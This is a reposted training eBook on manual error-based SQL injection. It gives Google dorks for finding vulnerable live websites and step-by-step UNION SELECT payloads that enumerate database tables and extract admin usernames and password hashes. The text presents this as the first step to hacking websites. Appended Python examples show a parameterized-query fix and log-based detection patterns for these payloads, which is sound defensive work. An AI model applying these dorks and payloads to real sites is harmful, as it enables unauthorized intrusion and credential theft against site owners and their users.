Seculabs eBook - SQL Injection Error Based - Manually

Date post: 14-Apr-2018
Upload: rifqi-multazam
7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 1/12
SECUGENIUS SECURITY SOLUTIONS

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of the youngsters.

Looking at the number of Cyber Crimes over the last many years, we at Secugenius Security Solutions provide training on Ethical Hacking & Cyber Security to students, IT Professionals, Bank Employees and Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the benefit of the students, making them aware of the latest trends in the technological era of the Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime Investigation & Forensic Sciences.

Secugenius provides various security solutions to its clients by securing their websites from cyber attacks. We provide training to college students, graduates and professionals in various fields. Education is delivered to students through two modes, i.e. Regular mode and Distance mode, which are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly experienced & skilled corporate trainers from different parts of the nation. We believe in making the base of students as strong as possible. All the modules have been designed in order to provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius, Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security Solutions.

This Online Digital Library has been initiated as a free resource & permanent resource on specialization basis for every student of Team Secugenius.


SQL Injection Error Based – Manually

Product ID No: SG/ODL/13038

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni

Secugenius Security Solutions 

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab – India

www.secugenius.com , www.seculabs.in 


What is SQL Injection?

SQL injection (Structured Query Language injection) is the first step in the entry to exploiting or hacking websites.

SQLi is basically injecting queries into a database, or using queries to get an authorization bypass as an admin.

Things you should know:

Data is in the columns, the columns are in tables, and the tables are in the database.

Step 1 – 

Finding SQLi-vulnerable sites is extremely easy; all you need to do is some googling.

Here are some Google dorks to find some vulnerable websites:

trainers.php?id=
article.php?ID=
games.php?id=
newsDetail.php?id=
news_view.php?id=
opinions.php?id=
pages.php?id=
view.php?id=
website.php?id=
detail.php?ID=
Productinfo.php?id=
releases.php?id=
shopping.php?id=
productdetail.php?id=
section.php?id=
page.php?id=


For example, the URL of the page will look like this:

http://example.com/gallery.php?id=126

To find this type of link, you can also use this type of Google dork: site:example.com id

Step 2 – 

To check that it is vulnerable, all you have to do is add ' at the end.

If it shows some type of error like "You have an error in your SQL syntax," then it means it is vulnerable to SQL injection.

Example – 

http://example.com/gallery.php?id=126'
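
Why the quote produces an error, and what removes it, as an added example (not from the original eBook): the weak form concatenates the id parameter into the SQL text, while the hardened form validates it and binds it as data. The gallery table, its column names and both function names are assumptions, and SQLite stands in for MySQL, so the error text differs from the MySQL message quoted above.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the gallery table (7 columns, as in the text)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gallery (id INTEGER PRIMARY KEY, c2, c3, title, c5, c6, c7)")
    db.execute("INSERT INTO gallery VALUES (126, 'a', 'b', 'Sunset', 'c', 'd', 'e')")
    return db

def lookup_concatenated(db, raw_id):
    """Weak form: the request parameter is pasted into the SQL text."""
    sql = "SELECT * FROM gallery WHERE id = " + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Returning the database error to the client is what makes the flaw visible.
        return "SQL error: %s" % exc

def lookup_parameterized(db, raw_id):
    """Hardened form: check the type first, then bind the value as data."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # anything that is not a plain integer never reaches the database
    return db.execute("SELECT * FROM gallery WHERE id = ?", (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Request values taken from the steps on this page.
    for value in ["126", "126'", "126 order by 8--",
                  "-126 union all select 1,2,3,4,5,6,7--"]:
        print(repr(value))
        print("  concatenated :", lookup_concatenated(db, value))
        print("  parameterized:", lookup_parameterized(db, value))
```

With the parameterized form, every request value other than a plain integer returns an empty result and no database error text is produced.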


Step 3 – 

After finding the vulnerability, the next step is to find the number of columns.

To find the number of columns, add "order by <Column No>--" at the end of the URL.

Example – 

(No Error) http://example.com/gallery.php?id=126 order by 1--
(No Error) http://example.com/gallery.php?id=126 order by 2--
(No Error) http://example.com/gallery.php?id=126 order by 3--
(No Error) http://example.com/gallery.php?id=126 order by 4--
(No Error) http://example.com/gallery.php?id=126 order by 5--
(No Error) http://example.com/gallery.php?id=126 order by 6--
(No Error) http://example.com/gallery.php?id=126 order by 7--
(Error!!) http://example.com/gallery.php?id=126 order by 8--

If you get an error, that means you should lower the number of columns.

If the page opened normally, that means the number of columns is between 1 and 7. In this case, we got an error on the 8th and the 7th opened normally.


Step 4 – 

The next step is to find the accessible columns.

Now that we have the number of columns, we need to get the column number that we can grab information from. We can do that by adding a "-" before 7 and replacing the "order by #" with "union all select" and the column numbers.

Example – 

http://example.com/gallery.php?id=-126 union all select 1,2,3,4,5,6,7--

So we should get the vulnerable column numbers.

(In this case, Vulnerable Column No. = 4)


Step 5 – 

The next step is to find the database version using this vulnerable column number.

Here, we found that only No. 4 is vulnerable, so we will use it to get the database version.

If the database version is under 5, that means we will have to guess the table names. So we need to replace one of the vulnerable columns with "@@version".

Example – 

http://example.com/gallery.php?id=-126 union all select 1,2,3,@@version,5,6,7--

In our case, we got "5.1.41-community".


Step 6 – 

Now we need to get the name of the table we want to access.

So we need to replace "@@version" with "table_name" and add "FROM information_schema.tables--" after the last column number.

Example – 

http://example.com/gallery.php?id=-126 union all select 1,2,3,table_name,5,6,7 FROM information_schema.tables--

It shows all tables. Now we will search for the table we want to access.

We should find something with admin in it, and in this case it's "admin".


Step 7 – 

Now we need to get the ASCII value of "admin".

From this website we get the ASCII value of "admin":

http://easycalculation.com/ascii-hex.php

So, the ASCII value is "97 100 109 105 110".

Now remove all characters in between the numbers and add a comma "," between each number.

Example – 97,100,109,105,110


Step 8 – 

Now we replace "table_name" in the URL with "column_name", change "information_schema.tables" to "information_schema.columns", and add "where table_name=char(ASCII Value)--".

In our case, in place of ASCII Value, we put (97,100,109,105,110)--

Example – 

http://example.com/gallery.php?id=-126 union all select 1,2,3,column_name,5,6,7 from information_schema.columns where table_name=char(97,100,109,105,110)--


Step 9 – 

Now we search for the "username" and "pass".

Remove everything after the 7, add "from admin--", and replace "column_name" with "concat(username,0x3a,pass)".

0x3a – the ASCII value of ":" (separator)

Example – 

http://example.com/gallery.php?id=-126 union all select 1,2,3,concat(username,0x3a,pass),5,6,7 from admin--

And you're done: the username is "superauthor" and the password is "a526e922b8c63041b7fb8df44d8966c".

In this case, the password is stored as a hash.

By using hash detectors, you can easily identify the hash type.
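
For the defending side, an added example (not from the original eBook) that flags this sequence of requests in a web server access log. The log lines are constructed, the signature and function names are hypothetical, and the patterns cover only the request shapes shown in Steps 2 to 9.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# One signature per request shape in the walkthrough, matched on the decoded query string.
SIGNATURES = {
    "quote_probe": re.compile(r"=\s*-?\d+\s*'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)*\s*\)", re.I),
}
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample lines (common log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Jul/2019:10:00:01 +0000] "GET /gallery.php?id=126 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Jul/2019:10:00:02 +0000] "GET /gallery.php?id=126%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [29/Jul/2019:10:00:05 +0000] "GET /gallery.php?id=126%20order%20by%208-- HTTP/1.1" 500 312',
    '203.0.113.9 - - [29/Jul/2019:10:00:09 +0000] "GET /gallery.php?id=-126+union+all+select+1,2,3,@@version,5,6,7-- HTTP/1.1" 200 5130',
    '203.0.113.9 - - [29/Jul/2019:10:00:14 +0000] "GET /gallery.php?id=-126%20union%20all%20select%201,2,3,column_name,5,6,7%20from%20information_schema.columns%20where%20table_name=char(97,100,109,105,110)-- HTTP/1.1" 200 5200',
    '198.51.100.7 - - [29/Jul/2019:10:00:20 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900',
    '192.0.2.44 - - [29/Jul/2019:10:00:31 +0000] "GET /gallery.php?id=126%27 HTTP/1.1" 500 312',
]

def classify(line):
    """Return (client_ip, [signature names]) for one access-log line, or None."""
    m = REQUEST.match(line)
    if not m:
        return None
    query = unquote_plus(urlsplit(m.group(2)).query)  # decode %20, %27 and '+'
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return (m.group(1), hits) if hits else None

def suspicious_clients(lines, min_distinct=2):
    """Clients that tripped at least min_distinct different signatures."""
    seen = defaultdict(set)
    for line in lines:
        result = classify(line)
        if result:
            seen[result[0]].update(result[1])
    return {ip: sorted(names) for ip, names in seen.items() if len(names) >= min_distinct}

if __name__ == "__main__":
    for ip, names in suspicious_clients(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

Requiring two distinct signatures per client keeps a single stray quote (the 192.0.2.44 line) out of the result while still catching the step-by-step enumeration.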

